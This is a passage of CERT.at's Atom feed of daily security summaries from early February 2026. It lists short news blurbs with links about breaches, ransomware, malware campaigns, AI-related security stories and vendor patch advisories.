&lt;A HREF=&quot;https://roundcube.net/news/2026/02/08/security-updates-1.6.13-and-1.5.13&quot;&gt;https://roundcube.net/news/2026/02/08/security-updates-1.6.13-and-1.5.13&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Firewalls and more: Almost 4,000 German edge devices are online without support&lt;/h3&gt;

German organisations operate thousands of vulnerable edge devices such as firewalls and VPN appliances. Urgent action is required.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/firewalls-und-mehr-fast-4-000-deutsche-edge-devices-haengen-ohne-support-im-netz-2602-205159.html&quot;&gt;https://www.golem.de/news/firewalls-und-mehr-fast-4-000-deutsche-edge-devices-haengen-ohne-support-im-netz-2602-205159.html&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-09T18:31:49Z</dc:date></entry><entry><title>Tageszusammenfassung - 06.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-06022026"/><author><name>CERT.at</name></author><updated>2026-02-06T18:14:37Z</updated><published>2026-02-06T18:14:37Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 05-02-2026 18:00 - Friday 06-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Alexander Riepl


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;No Pain, No Gain - How Impunity Perpetuates Failure&lt;/h3&gt;

It's time to treat cybersecurity incidents and data breaches like preventable disasters, not the inevitable cost of doing business.
&lt;p /&gt;
&lt;A HREF=&quot;https://bytesandborscht.com/no-pain-no-gain-how-impunity-perpetuates-failure/&quot;&gt;https://bytesandborscht.com/no-pain-no-gain-how-impunity-perpetuates-failure/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ransomware gang uses ISPsystem VMs for stealthy payload delivery&lt;/h3&gt;

Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-ispsystem-vms-for-stealthy-payload-delivery/&quot;&gt;https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-ispsystem-vms-for-stealthy-payload-delivery/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Spain's Ministry of Science shuts down systems after breach claims&lt;/h3&gt;

Spain's Ministry of Science (Ministerio de Ciencia) announced a partial shutdown of its IT systems, affecting several citizen- and company-facing services.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/spains-ministry-of-science-shuts-down-systems-after-breach-claims/&quot;&gt;https://www.bleepingcomputer.com/news/security/spains-ministry-of-science-shuts-down-systems-after-breach-claims/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CISA orders federal agencies to replace end-of-life edge devices&lt;/h3&gt;

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a new binding operational directive requiring federal agencies to identify and remove network edge devices that no longer receive security updates from manufacturers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/cisa-orders-federal-agencies-to-replace-end-of-life-edge-devices/&quot;&gt;https://www.bleepingcomputer.com/news/security/cisa-orders-federal-agencies-to-replace-end-of-life-edge-devices/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Compromised dYdX npm and PyPI Packages Deliver Wallet Stealers and RAT Malware&lt;/h3&gt;

Cybersecurity researchers have discovered a new supply chain attack in which legitimate packages on npm and the Python Package Index (PyPI) repository have been compromised to push malicious versions to facilitate wallet credential theft and remote code execution.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/compromised-dydx-npm-and-pypi-packages.html&quot;&gt;https://thehackernews.com/2026/02/compromised-dydx-npm-and-pypi-packages.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Claude Opus 4.6 Finds 500+ High-Severity Flaws Across Major Open-Source Libraries&lt;/h3&gt;

Artificial intelligence (AI) company Anthropic revealed that its latest large language model (LLM), Claude Opus 4.6, has found more than 500 previously unknown high-severity security flaws in open-source libraries, including Ghostscript, OpenSC, and CGIF.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/claude-opus-46-finds-500-high-severity.html&quot;&gt;https://thehackernews.com/2026/02/claude-opus-46-finds-500-high-severity.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Data leak at Substack: Data set with almost 700,000 entries online&lt;/h3&gt;

Cybercriminals have siphoned off data from Substack. The data set comprises around 700,000 entries and is available online.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11167482&quot;&gt;https://heise.de/-11167482&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Attack via Signal: BfV and BSI warn politicians, military personnel and diplomats&lt;/h3&gt;

An attack on users of the Signal messenger that became known last week targets members of the Bundestag and other high-profile individuals.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11168254&quot;&gt;https://heise.de/-11168254&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security updates for Friday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (freerdp, kernel, python3, and python3.12-wheel), Debian (alsa-lib, chromium, openjdk-25, phpunit, tomcat10, tomcat11, and tomcat9), Fedora (openqa, pgadmin4, phpunit10, phpunit11, phpunit12, phpunit8, phpunit9, and yarnpkg), Mageia (python-django), SUSE (alloy, cups, dpdk, expat, glib2, java-1_8_0-ibm, java-1_8_0-openj9, java-25-openjdk, kernel, libpainter0, libsoup, libxml2, openssl-3, python-filelock, python-wheel, python312-Django6, thunderbird, traefik2, udisks2, wireshark, and xen), and Ubuntu (glib2.0, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, python3.14, python3.13, python3.12, python3.11, python3.10, python3.9, python3.8, python3.7, python3.6, python3.5, python3.4, and tracker-miners). 
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1057506/&quot;&gt;https://lwn.net/Articles/1057506/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;TeamViewer: Vulnerability allows access without prior confirmation&lt;/h3&gt;

A security vulnerability has been discovered in TeamViewer that allows authenticated attackers to access resources before this permission has been confirmed locally. Updated software packages are available to fix the vulnerability. IT managers who use TeamViewer should update promptly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/TeamViewer-Luecke-erlaubt-Zugriffe-ohne-vorherige-Bestaetigung-11167398.html&quot;&gt;https://www.heise.de/news/TeamViewer-Luecke-erlaubt-Zugriffe-ohne-vorherige-Bestaetigung-11167398.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for F5 BIG-IP: Attackers can paralyse data traffic&lt;/h3&gt;

If attackers successfully exploit security vulnerabilities in BIG-IP appliances such as Advanced WAF/ASM or APM, they can trigger crashes or view data that should be protected. Patched versions are available for download. So far there are no reports of attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11167422&quot;&gt;https://heise.de/-11167422&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;DSA-6122-1 chromium - security update&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lists.debian.org/debian-security-announce/2026/msg00031.html&quot;&gt;https://lists.debian.org/debian-security-announce/2026/msg00031.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;TP-Link Systems Inc. VIGI Series IP Camera&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-036-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-036-01&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-06T18:14:37Z</dc:date></entry><entry><title>Tageszusammenfassung - 05.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-05022026"/><author><name>CERT.at</name></author><updated>2026-02-05T18:22:56Z</updated><published>2026-02-05T18:22:56Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 04-02-2026 18:00 - Thursday 05-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Zendesk spam wave returns, floods users with Activate account emails&lt;/h3&gt;

A fresh wave of spam is hitting inboxes worldwide, with users reporting that they are once again being bombarded by automated emails generated through companies' unsecured Zendesk support systems. Some recipients say they are receiving hundreds of messages with strange or alarming subject lines.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/zendesk-spam-wave-returns-floods-users-with-activate-account-emails/&quot;&gt;https://www.bleepingcomputer.com/news/security/zendesk-spam-wave-returns-floods-users-with-activate-account-emails/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CISA: VMware ESXi flaw now exploited in ransomware attacks&lt;/h3&gt;

CISA confirmed on Wednesday that ransomware gangs have begun exploiting a high-severity VMware ESXi sandbox escape vulnerability that was used in zero-day attacks since at least February 2024. Broadcom patched this ESXi arbitrary-write vulnerability (tracked as CVE-2025-22225) almost one year ago, in March 2025, alongside a memory leak (CVE-2025-22226) and a TOCTOU flaw (CVE-2025-22224), and tagged them all as actively exploited zero-days.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/cisa-vmware-esxi-flaw-now-exploited-in-ransomware-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/cisa-vmware-esxi-flaw-now-exploited-in-ransomware-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Broken Phishing URLs, (Thu, Feb 5th)&lt;/h3&gt;

For a few days, many phishing emails that landed in my mailbox contain strange URLs. [..] But the format of the URLs is broken! In a URL, parameters are extra pieces of information added after a question mark (?) to tell a website more details about a request; they are written as name=value pairs (for example &quot;email=user@domain&quot;), and multiple parameters are separated by an ampersand (&amp;). [..] Threat actors implement this to break security controls.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32686&quot;&gt;https://isc.sans.edu/diary/rss/32686&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Three clues that your LLM may be poisoned with a sleeper-agent back door&lt;/h3&gt;

The threat sees an attacker embed a hidden backdoor into the model's weights - the importance assigned to the relationship between pieces of information - during its training. Attackers can activate the backdoor using a predefined phrase. [..] In a research paper [PDF] published this week, Kumar and coauthors detailed a lightweight scanner to help enterprises detect backdoored models.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/02/05/llm_poisoned_how_to_tell/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/02/05/llm_poisoned_how_to_tell/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Technical Analysis of Marco Stealer&lt;/h3&gt;

Zscaler ThreatLabz has discovered an information stealer that we named Marco Stealer, which was first observed in June 2025. Marco Stealer primarily targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim's system. Marco Stealer implements several anti-analysis techniques including string encryption and terminating security tools.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.zscaler.com/blogs/security-research/technical-analysis-marco-stealer&quot;&gt;https://www.zscaler.com/blogs/security-research/technical-analysis-marco-stealer&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The Shadow Campaigns: Uncovering Global Espionage&lt;/h3&gt;

This investigation unveils a new cyberespionage group that Unit 42 tracks as TGR-STA-1030. We refer to the group's activity as the Shadow Campaigns. [..] Over the past year, this group has compromised government and critical infrastructure organizations across 37 countries. This means that approximately one out of every five countries has experienced a critical breach from this group in the past year.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/shadow-campaigns-uncovering-global-espionage/&quot;&gt;https://unit42.paloaltonetworks.com/shadow-campaigns-uncovering-global-espionage/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Black Basta: Defense Evasion Capability Embedded in Ransomware Payload&lt;/h3&gt;

Normally the BYOVD defense evasion component of an attack would involve a distinct tool that would be deployed on the system prior to the ransomware payload in order to disable security software. However, in this attack, the vulnerable driver (an NsecSoft NSecKrnl driver) was bundled with the ransomware itself.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.security.com/threat-intelligence/black-basta-ransomware-byovd&quot;&gt;https://www.security.com/threat-intelligence/black-basta-ransomware-byovd&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Knife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework&lt;/h3&gt;

Cisco Talos uncovered &quot;DKnife,&quot; a fully featured gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants that perform deep-packet inspection, manipulate traffic, and deliver malware via routers and edge devices. [..] DKnife's attacks target a wide range of devices, including PCs, mobile devices, and Internet of Things (IoT) devices. It delivers and interacts with the ShadowPad and DarkNimbus backdoors by hijacking binary downloads and Android application updates.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.talosintelligence.com/knife-cutting-the-edge/&quot;&gt;https://blog.talosintelligence.com/knife-cutting-the-edge/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Sanctioned Bulletproof Host Linked to Hijacking of Old Home Routers&lt;/h3&gt;

Compromised home routers in 30+ countries had DNS traffic redirected, sending users to malicious sites while normal browsing appeared unaffected. [..] According to Infoblox, the manipulated DNS traffic was routed to resolvers hosted by Aeza International, a Russian bulletproof hosting provider sanctioned by the US government in July 2025.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/sanctioned-bulletproof-host-hijack-old-home-routers/&quot;&gt;https://hackread.com/sanctioned-bulletproof-host-hijack-old-home-routers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How to write your first obfuscator of Java Bytecode&lt;/h3&gt;

In this article I describe Java bytecode obfuscation, using one of the challenges I did in 2023 as part of the interviews with Quarkslab for the position of Java compiler engineer in QShield.
&lt;p /&gt;
&lt;A HREF=&quot;http://blog.quarkslab.com/how-to-write-your-first-obfuscator-of-java-bytecode.html&quot;&gt;http://blog.quarkslab.com/how-to-write-your-first-obfuscator-of-java-bytecode.html&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Cisco Security Advisories 05.02.2026&lt;/h3&gt;

Cisco Meeting Management, Cisco Secure Web Appliance, Cisco TelePresence Collaboration Endpoint Software and RoomOS, Cisco Prime Infrastructure, Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/Search.x?publicationTypeIDs=1&amp;firstPublishedStartDate=2026%2F02%2F04&amp;firstPublishedEndDate=2026%2F02%2F05&amp;pageNum=1&amp;isRenderingBugList=false&amp;isRenderingCveList=false&amp;isRenderingCveAdvisoryList=false&quot;&gt;https://sec.cloudapps.cisco.com/security/center/Search.x?publicationTypeIDs=1&amp;firstPublishedStartDate=2026%2F02%2F04&amp;firstPublishedEndDate=2026%2F02%2F05&amp;pageNum=1&amp;isRenderingBugList=false&amp;isRenderingCveList=false&amp;isRenderingCveAdvisoryList=false&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Thursday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (brotli, curl, kernel, python-wheel, and python3.12), Debian (containerd), Fedora (gnupg2, pgadmin4, phpunit10, phpunit11, phpunit12, phpunit8, phpunit9, and yarnpkg), Mageia (expat), Oracle (qemu-kvm and util-linux), Red Hat (kernel, kernel-rt, opentelemetry-collector, and python3.12-wheel), SUSE (abseil-cpp, dpdk, freerdp, glib2, ImageMagick, java-11-openj9, java-17-openj9, java-1_8_0-ibm, java-1_8_0-openj9, java-1_8_0-openjdk, java-21-openj9, kernel, libsoup, libsoup-3_0-0, openssl-3, patch, python-Django, rekor, rizin, udisks2, and xrdp), and Ubuntu (gh, linux, linux-aws, linux-azure, linux-azure-5.15, linux-gcp, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle, linux-raspi, linux, linux-aws, linux-azure, linux-gcp, linux-oem-6.17, linux-oracle, linux-raspi, linux-realtime, linux, linux-gke, linux-gkeop, linux-hwe-6.8, linux-oracle, linux-oracle-6.8, linux-raspi, linux-fips, linux-aws-fips, linux-azure-fips, linux-gcp-fips, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-realtime, linux-intel-iot-realtime, and linux-realtime, linux-realtime-6.8, linux-raspi-realtime).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1057381/&quot;&gt;https://lwn.net/Articles/1057381/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Automation tool n8n: further critical vulnerabilities closed&lt;/h3&gt;

The developers of the automation tool n8n have closed further security vulnerabilities. Updating to the latest version is recommended. [..] A list of the new CVE entries sorted by severity does, however, provide an overview; details can be found on the n8n security page.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11165845&quot;&gt;https://heise.de/-11165845&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Splunk: SVD-2026-0201: Third-Party Package Updates in Splunk SOAR - February 2026&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://advisory.splunk.com//advisories/SVD-2026-0201&quot;&gt;https://advisory.splunk.com//advisories/SVD-2026-0201&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Splunk: SVD-2025-1205: Incorrect permissions assignment on Splunk Enterprise for Windows during new installation or upgrade&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://advisory.splunk.com//advisories/SVD-2025-1205&quot;&gt;https://advisory.splunk.com//advisories/SVD-2025-1205&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Zyxel security advisory for post-authentication command injection vulnerability in the DDNS configuration CLI command of ZLD firewalls&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-vulnerability-in-the-ddns-configuration-cli-command-of-zld-firewalls-02-05-2026&quot;&gt;https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-vulnerability-in-the-ddns-configuration-cli-command-of-zld-firewalls-02-05-2026&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Android Patchday: driver vulnerability endangers Pixel smartphones&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11165905&quot;&gt;https://heise.de/-11165905&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-05T18:22:56Z</dc:date></entry><entry><title>Daily summary - 04.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-04022026"/><author><name>CERT.at</name></author><updated>2026-02-04T18:24:13Z</updated><published>2026-02-04T18:24:13Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 03-02-2026 18:00 - Wednesday 04-02-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Wave of Citrix NetScaler scans use thousands of residential proxies&lt;/h3&gt;

A coordinated reconnaissance campaign targeting Citrix NetScaler infrastructure over the past week used tens of thousands of residential proxies to discover login panels.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/wave-of-citrix-netscaler-scans-use-thousands-of-residential-proxies/&quot;&gt;https://www.bleepingcomputer.com/news/security/wave-of-citrix-netscaler-scans-use-thousands-of-residential-proxies/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Broken key: another ransomware blunder leads to total loss&lt;/h3&gt;

The Nitrogen ransomware contains a bug that renders all ransom negotiations pointless: the data can no longer be decrypted.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/schluessel-kaputt-weitere-ransomware-panne-fuehrt-zu-totalverlust-2602-204974.html&quot;&gt;https://www.golem.de/news/schluessel-kaputt-weitere-ransomware-panne-fuehrt-zu-totalverlust-2602-204974.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AI agents can't yet pull off fully autonomous cyberattacks - but they are already very helpful to crims&lt;/h3&gt;

Don't relax: this is a &quot;when, not if&quot; scenario. AI agents and other systems can't yet conduct cyberattacks fully on their own - but they can help criminals in many stages of the attack chain, according to the International AI Safety report.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/02/03/autonomous_cyberattacks_not_real_yet/&quot;&gt;https://www.theregister.com/2026/02/03/autonomous_cyberattacks_not_real_yet/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Clouds rush to deliver OpenClaw-as-a-service offerings&lt;/h3&gt;

As analyst house Gartner declares the AI tool &quot;comes with unacceptable cybersecurity risk&quot; and urges admins to snuff it out. If you're brave enough to want to run the demonstrably insecure AI assistant OpenClaw, several clouds have already started offering it as a service.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/02/04/cloud_hosted_openclaw/&quot;&gt;https://www.theregister.com/2026/02/04/cloud_hosted_openclaw/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Attacks on Solarwinds Web Help Desk, FreePBX and Gitlab observed&lt;/h3&gt;

CISA warns of recently observed attacks on security vulnerabilities in Solarwinds Web Help Desk, FreePBX and Gitlab.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Angriffe-auf-Solarwinds-Web-Help-Desk-FreePBX-und-Gitlab-beobachtet-11164498.html&quot;&gt;https://www.heise.de/news/Angriffe-auf-Solarwinds-Web-Help-Desk-FreePBX-und-Gitlab-beobachtet-11164498.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Phishing: fake cloud storage warning traced&lt;/h3&gt;

Phishing emails do not only target credentials directly; more often they lead victims to affiliate marketing pages.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Phishing-Falsche-Cloud-Speicher-Warnung-nachverfolgt-11164973.html&quot;&gt;https://www.heise.de/news/Phishing-Falsche-Cloud-Speicher-Warnung-nachverfolgt-11164973.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Wanted: emergency trade service. Found: referral agency&lt;/h3&gt;

Behind numerous websites of emergency plumbers, locksmiths and similar businesses there are no actual tradespeople at all, only referral agencies. This is not illegal, but it can still have unpleasant consequences for those affected. How to recognise the agencies' websites and how best to prepare for an emergency.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/vermittlungsagentur-statt-handwerksdienst/&quot;&gt;https://www.watchlist-internet.at/news/vermittlungsagentur-statt-handwerksdienst/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Exclusive: US used cyber weapons to disrupt Iranian air defenses during 2025 strikes&lt;/h3&gt;

The U.S. military digitally disrupted Iranian air missile defense systems during its operation last year against the country's nuclear program, some of the most sophisticated action Cyber Command has taken to date against Iran.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/iran-nuclear-cyber-strikes-us&quot;&gt;https://therecord.media/iran-nuclear-cyber-strikes-us&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Phishing Campaigns Abuse Trusted Cloud Platforms, Raising New Risks for Enterprises&lt;/h3&gt;

ANY.RUN experts report a surge in phishing campaigns abusing trusted cloud and CDN platforms to bypass security controls and target enterprise users.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/phishing-campaigns-cloud-platforms-enterprises-risks/&quot;&gt;https://hackread.com/phishing-campaigns-cloud-platforms-enterprises-risks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;React Server Components Exploitation Consolidates as Two IPs Generate Majority of Attack Traffic&lt;/h3&gt;

Two months after CVE-2025-55182 was disclosed on December 3, 2025, exploitation activity targeting React Server Components has consolidated significantly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.greynoise.io/blog/react2shell-exploitation-consolidates&quot;&gt;https://www.greynoise.io/blog/react2shell-exploitation-consolidates&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Native Sysmon integration in Windows draws closer&lt;/h3&gt;

Microsoft has released Windows Insider previews that ship the powerful Sysmon logging tool as a Windows feature.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11164696&quot;&gt;https://heise.de/-11164696&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Web Traffic Hijacking: When Your Nginx Configuration Turns Malicious&lt;/h3&gt;

Datadog Security Research has identified an active web traffic hijacking campaign that targets NGINX installations and management panels like Baota (BT). In this post, we provide our analysis of the techniques this campaign uses and share indicators of compromise you can check for in your NGINX configurations.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/web-traffic-hijacking-nginx-configuration-malicious/&quot;&gt;https://securitylabs.datadoghq.com/articles/web-traffic-hijacking-nginx-configuration-malicious/&lt;/a&gt;

&lt;hr&gt;


&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Critical Vulnerability Alert: CVE-2025-40551 in SolarWinds Web Help Desk&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bitsight.com/blog/cve-2025-40551-solarwinds-critical-vulnerability&quot;&gt;https://www.bitsight.com/blog/cve-2025-40551-solarwinds-critical-vulnerability&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-04T18:24:13Z</dc:date></entry><entry><title>Daily summary - 03.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-03022026"/><author><name>CERT.at</name></author><updated>2026-02-03T19:23:28Z</updated><published>2026-02-03T19:23:28Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 02-02-2026 18:00 - Tuesday 03-02-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Active exploitation of security vulnerabilities in Ivanti Endpoint Manager Mobile (CVE-2026-1281, CVE-2026-1340)&lt;/h3&gt;

Two recently fixed security vulnerabilities in Ivanti Endpoint Manager Mobile (CVE-2026-1281 and CVE-2026-1340; see our warning of 31.01.2026 as well as a technical analysis by the security experts at Watchtowr) are already being exploited by threat actors. According to Ivanti itself, the investigation of the incidents known so far is still ongoing and reliable technical indicators are not yet available.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/de/aktuelles/2026/2/aktive-ausnutzung-von-sicherheitslucken-in-ivanti-endpoint-manager-mobile-cve-2026-1281-cve-2026-1340&quot;&gt;https://www.cert.at/de/aktuelles/2026/2/aktive-ausnutzung-von-sicherheitslucken-in-ivanti-endpoint-manager-mobile-cve-2026-1281-cve-2026-1340&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers exploit critical React Native Metro bug to breach dev systems&lt;/h3&gt;

Hackers are targeting developers by exploiting the critical vulnerability CVE-2025-11953 in the Metro server for React Native to deliver malicious payloads for Windows and Linux.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-use-critical-react-native-metro-bug-to-breach-dev-systems/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-use-critical-react-native-metro-bug-to-breach-dev-systems/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Iron Mountain: Data breach mostly limited to marketing materials&lt;/h3&gt;

Iron Mountain, a leading data storage and recovery services company, says that a recent breach claimed by the Everest extortion gang is limited to mostly marketing materials.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/iron-mountain-data-breach-mostly-limited-to-marketing-materials/&quot;&gt;https://www.bleepingcomputer.com/news/security/iron-mountain-data-breach-mostly-limited-to-marketing-materials/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Attackers Harvest Dropbox Logins Via Fake PDF Lures&lt;/h3&gt;

A malware-free phishing campaign targets corporate inboxes and asks employees to view &quot;request orders,&quot; ultimately leading to Dropbox credential theft.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/cloud-security/attackers-harvest-dropbox-logins-fake-pdf-lures&quot;&gt;https://www.darkreading.com/cloud-security/attackers-harvest-dropbox-logins-fake-pdf-lures&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Detecting and Monitoring OpenClaw (clawdbot, moltbot)&lt;/h3&gt;

Last week, a new AI agent framework was introduced to automate &quot;live&quot;. It targets office work in particular, focusing on messaging and interacting with systems. The tool has gone viral not so much because of its features, which are similar to those of other agent frameworks, but because of a stream of security oversights in its design.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32678&quot;&gt;https://isc.sans.edu/diary/rss/32678&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users&lt;/h3&gt;

A security audit of 2,857 skills on ClawHub has found 341 malicious skills across multiple campaigns, according to new findings from Koi Security, exposing users to new supply chain risks. ClawHub is a marketplace designed to make it easy for OpenClaw users to find and install third-party skills.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html&quot;&gt;https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;APT28 Leverages CVE-2026-21509 in Operation Neusploit&lt;/h3&gt;

